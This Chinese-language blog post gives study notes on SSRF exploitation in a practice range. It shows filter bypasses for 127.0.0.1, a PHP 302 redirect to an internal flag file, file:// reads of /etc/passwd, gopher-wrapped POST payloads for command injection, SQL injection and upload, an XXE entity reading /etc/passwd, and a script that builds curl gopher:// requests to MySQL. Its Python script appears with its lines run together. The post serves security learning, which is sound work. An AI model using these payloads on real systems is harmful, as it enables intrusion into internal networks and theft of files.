当前位置：首页 > news >正文

SSRF学习

news 来源：原创 2025/4/21 15:06:59

靶场

fofa搜：“重庆橙子科技”，里面找SSRF。

SSRF基础知识

绕过127限制

要查看127.0.0.1/flag.php，但是127被过滤。

绕过方法：使用不同的进制表示127.0.0.1即可。

二进制：01111111.00000000.00000000.00000001
八进制：17700000001
十六进制：7F000001
十进制：2130706433

八进制：http://017700000001/flag.php
十六进制：http://0x7F000001/flag.php
十进制：http://2130706433/flag.php

302重定向绕过ip地址限制

在本地搭建一个非局域网下的网站，网站中写入302重定向的代码，让目标访问此网站，然后即可重定向到127访问到flag文件。

<?php
header('location:http://127.0.0.1/flag.php');
?>

SSRF内网渗透

SSRF前置知识NAT

攻击目标：从外网无法访问的内部系统。

形成原因：大部分是由于服务端是由于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址做过滤或限制。

攻击方式：借助主机A来发起SSRF攻击，通过主机A向主机B发起请求，从而获取主机B的一些信息。

伪协议

file:///etc/passwd      读取文件passwd
file:///etc/hosts       显示当前操作系统网卡的ip
file:///proc/net/arp    显示arp缓存表（寻找内网其他主机）
file:///proc/net/fib_tire   显示当前网段路由信息

寻找存活的主机

获取到IP后，对内网主机进行扫码，使用arp协议。

访问一个其他的ip，如果进行访问，一定会发送arp请求，对方必然要回复。

使用BP直接爆破访问所有的ip
然后使用file:///proc/net/arp，读取存活的主机

寻找开放的端口

在IP后添加端口，时间长，不推荐。

使用集群炸弹攻击，ip和端口。根据应答的长度来判断端口是否打开。

命令执行

直接执行：

http://172.250.250.4/shell.php?cmd=ls

gopher和占位符：

gopher://172.250.250.4

post提交

靶场的http:172.250.250.5

首先查看源代码，找到POST传参的名称。

构造payload：

POST / HTTP/1.1
Host: 172.250.250.5
Content-Type: application/x-www-from-urlencoded
Content-Length: 12

ip=127.0.0.1

使用gopher伪协议，然后抓包：

将构造的payload放在参数后面：

将参数进行两次url编码即可。

进行命令执行：

在ip后加;要执行的命令即可。

SSRF配合其他漏洞

用SSRF进行XXE漏洞利用

file查网段，dict查端口，http目录扫描

查看源代码，发现对用户名和密码的处理类似于xml，构造payload，使用gopher协议模拟访问一下。

POST /doLogin.php HTTP/1.1
Host: 172.250.250.6
Content-Type: application/xml
Content-Length: 65

<user><username>admin</username><password>admin</password></user>

回复的结果也是xml的格式。

回显了用户名。构造payload代码：

POST /doLogin.php HTTP/1.1
Host: 172.250.250.6
Content-Type: application/xml
Content-Length: 124（和下面的字符数量对应）

<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><user><username>&xxe;</username><password>admin</password></user>

得到文件。

用SSRF进行SQL注入

GET提交

直接在POST提交的链接后面跟参数，和SQL注入流程相同，然后将注入语句进行两次URL编码。将--+后面的+换成%20。

POST提交

和XXE漏洞一样，使用gopher伪协议，构造POST提交的payload

POST /Less-11 HTTP/1.1
Host: 172.250.250.11
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

uname=admin&passwd=admin&submit=submit

用SSRF进行文件上传

multipart/from-data：媒体类型（multipart/from-data）的数据体由多个部分组成，这些部分由于一个固定的边界值分隔。

构造payload：

同样，gopher伪协议后再在后面加payload。进行两次URL编码。

利用SSRF进行文件包含

直接在URL中使用file伪协议，空格用%20代替。

利用SSRF对mysql进行未授权查询

目的：利用SSRF来执行自己想执行的mysql语句。

1、打开抓包：使用tcpdump（命令行）和wireshark（图形化）

tcpdump -i lo port 3306 -w mysql.pcapng

2、写入指令：

mysql -h127.0.0.1 -uroot --ssl-mode=DISABLED -e "show databases;"

3、把抓取的文件复制到本地，用wireshark打开

右键：跟踪流->TCP流
筛选过滤：源端口任意，目标端口3306

4、复制数据，去掉换行符

5、ASCII码转换URL编码。

转换脚本：

import sys
def results(s):a=[s[i:i+2] for i in range(0,len(s),2)]return "curl gopher://127.0.0.1:3306/_%"+"%".join(a)
if __name__=="__main__":s=sys.argv[1]print(results(s))

6、复制转换后的内容，更改ip

7、提交payload